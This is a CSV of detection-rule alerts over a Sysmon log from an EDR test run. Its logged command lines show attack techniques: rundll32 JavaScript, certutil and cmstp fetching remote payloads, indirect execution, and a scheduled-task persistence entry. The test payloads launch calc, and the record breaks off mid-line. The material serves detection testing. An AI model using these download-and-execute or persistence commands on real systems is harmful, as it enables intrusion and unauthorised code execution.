+2019-07-30 06:34:00.970 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5256 | PGUID: 747F3D96-6648-5D3F-0000-0010B9AB8B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:01.090 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\dispdiag.exe -out dispdiag_start.dat | Process: C:\Windows\System32\dispdiag.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl | LID: 0x413182 | PID: 3704 | PGUID: 747F3D96-6648-5D3F-0000-001092BB8B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:05.237 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c rundll32 AllTheThings.dll,EntryPoint | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6836 | PGUID: 747F3D96-664D-5D3F-0000-0010F1498C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:05.252 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6056 | PGUID: 747F3D96-664D-5D3F-0000-0010114D8C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:05.502 
+09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 AllTheThings.dll,EntryPoint | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c rundll32 AllTheThings.dll,EntryPoint | LID: 0x413182 | PID: 912 | PGUID: 747F3D96-664D-5D3F-0000-00108D5B8C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:05.542 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 AllTheThings.dll,EntryPoint | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: rundll32 AllTheThings.dll,EntryPoint | LID: 0x413182 | PID: 5572 | PGUID: 747F3D96-664D-5D3F-0000-0010BB5D8C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:10.373 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"") | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5844 | PGUID: 747F3D96-6652-5D3F-0000-0010B9708C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:10.373 +09:00,MSEDGEWIN10,1,high,Evas,Rundll32 JS RunHTMLApplication Pattern,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_js_runhtmlapplication.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:10.373 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Script in 
CommandLine,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:10.388 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5268 | PGUID: 747F3D96-6652-5D3F-0000-001059728C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:10.708 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"") | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"") | LID: 0x413182 | PID: 348 | PGUID: 747F3D96-6652-5D3F-0000-001058828C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:10.708 +09:00,MSEDGEWIN10,1,high,Evas,Rundll32 JS RunHTMLApplication Pattern,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_js_runhtmlapplication.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:10.708 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 
+2019-07-30 06:34:10.708 +09:00,MSEDGEWIN10,1,high,,Application Executed Non-Executable Extension,,rules/sigma/process_creation/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:11.501 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"") | LID: 0x413182 | PID: 4888 | PGUID: 747F3D96-6653-5D3F-0000-001083BC8C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:12.352 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:49831 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\rundll32.exe | PID: 348 | PGUID: 747F3D96-6652-5D3F-0000-001058828C00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:12.352 +09:00,MSEDGEWIN10,3,medium,Evas | Exec,Rundll32 Internet Connection,,rules/sigma/network_connection/sysmon_rundll32_net_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:15.226 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);} | Process: C:\Windows\System32\cmd.exe | 
User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 1808 | PGUID: 747F3D96-6657-5D3F-0000-001029198D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:15.226 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:15.252 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2296 | PGUID: 747F3D96-6657-5D3F-0000-0010D01A8D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:15.658 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);} | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);} | LID: 0x413182 | PID: 1004 | PGUID: 
747F3D96-6657-5D3F-0000-001011298D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:15.658 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:15.658 +09:00,MSEDGEWIN10,1,high,,Application Executed Non-Executable Extension,,rules/sigma/process_creation/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:20.238 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 7088 | PGUID: 747F3D96-665C-5D3F-0000-0010096B8D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:20.238 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:20.262 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3076 | PGUID: 
747F3D96-665C-5D3F-0000-0010DC6B8D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:20.459 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 | Process: C:\Windows\System32\certutil.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 | LID: 0x413182 | PID: 4520 | PGUID: 747F3D96-665C-5D3F-0000-0010E37B8D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:20.459 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:21.867 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49832 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\certutil.exe | PID: 4520 | PGUID: 747F3D96-665C-5D3F-0000-0010E37B8D00,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:21.867 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49833 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\certutil.exe | PID: 4520 | PGUID: 
747F3D96-665C-5D3F-0000-0010E37B8D00,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:25.202 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6428 | PGUID: 747F3D96-6661-5D3F-0000-00107AB88D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:25.269 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5888 | PGUID: 747F3D96-6661-5D3F-0000-00103CBD8D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:25.659 +09:00,MSEDGEWIN10,1,high,PrivEsc | Evas,Bypass UAC via CMSTP,,rules/sigma/process_creation/proc_creation_win_uac_cmstp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:25.659 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf | Process: C:\Windows\System32\cmstp.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf | LID: 0x413182 | PID: 6820 | PGUID: 
747F3D96-6661-5D3F-0000-0010CBC88D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:30.237 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2244 | PGUID: 747F3D96-6666-5D3F-0000-001016F78D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:30.258 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4976 | PGUID: 747F3D96-6666-5D3F-0000-0010C6F88D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:30.685 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe | Process: C:\Windows\System32\forfiles.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe | LID: 0x413182 | PID: 1464 | PGUID: 747F3D96-6666-5D3F-0000-0010AE068E00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:30.807 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe | LID: 0x413182 | PID: 4336 | PGUID: 
747F3D96-6666-5D3F-0000-0010DF098E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:30.807 +09:00,MSEDGEWIN10,1,low,Evas,Indirect Command Execution,,rules/sigma/process_creation/proc_creation_win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:35.313 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c winrm qc -q | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5840 | PGUID: 747F3D96-666B-5D3F-0000-001051638E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:35.337 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine=""calc""} | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 1580 | PGUID: 747F3D96-666B-5D3F-0000-001033648E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:35.347 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6412 | PGUID: 747F3D96-666B-5D3F-0000-00107C668E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:35.838 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cscript 
//nologo ""C:\Windows\System32\winrm.vbs"" qc -q | Process: C:\Windows\System32\cscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c winrm qc -q | LID: 0x413182 | PID: 3224 | PGUID: 747F3D96-666B-5D3F-0000-00102F7F8E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:35.838 +09:00,MSEDGEWIN10,1,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:35.878 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cscript //nologo ""C:\Windows\System32\winrm.vbs"" i c wmicimv2/Win32_Process @{CommandLine=""calc""} | Process: C:\Windows\System32\cscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine=""calc""} | LID: 0x413182 | PID: 264 | PGUID: 747F3D96-666B-5D3F-0000-0010EF858E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:35.878 +09:00,MSEDGEWIN10,1,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:36.421 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious Microsoft.XMLDOM module load | Image: C:\Windows\System32\msxml3.dll | Process: C:\Windows\System32\cscript.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 3224 | PGUID: 747F3D96-666B-5D3F-0000-00102F7F8E00 | Hash: 
SHA1=23805C325D9D4F0A3467F6D2A402A259C376A7F0,MD5=D1B65A6CC7A53A0B68BEE51C639E8F01,SHA256=C948999A3823DA8EBA679F15ABAAEB5E057C91EB716A9DBF9F97FFD09E96CBF7,IMPHASH=2E1D1E35C17BE5497D2DE33F06DC41B4",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:36.534 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: calc | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x413182 | PID: 3872 | PGUID: 747F3D96-666C-5D3F-0000-00104BB78E00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:36.534 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:36.548 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious Microsoft.XMLDOM module load | Image: C:\Windows\System32\msxml3.dll | Process: C:\Windows\System32\cscript.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 264 | PGUID: 747F3D96-666B-5D3F-0000-0010EF858E00 | Hash: SHA1=23805C325D9D4F0A3467F6D2A402A259C376A7F0,MD5=D1B65A6CC7A53A0B68BEE51C639E8F01,SHA256=C948999A3823DA8EBA679F15ABAAEB5E057C91EB716A9DBF9F97FFD09E96CBF7,IMPHASH=2E1D1E35C17BE5497D2DE33F06DC41B4",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:40.261 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Calculator 
Usage,,rules/sigma/process_creation/proc_creation_win_susp_calc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:40.261 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c schtasks /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2916 | PGUID: 747F3D96-6670-5D3F-0000-001099048F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:40.385 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4720 | PGUID: 747F3D96-6670-5D3F-0000-00105F098F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:40.889 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence - Scheduled Task Management | Cmd: schtasks /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f | Process: C:\Windows\System32\schtasks.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c schtasks /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f | LID: 0x413182 | PID: 7076 | PGUID: 747F3D96-6670-5D3F-0000-0010F9148F00 | Hash: 
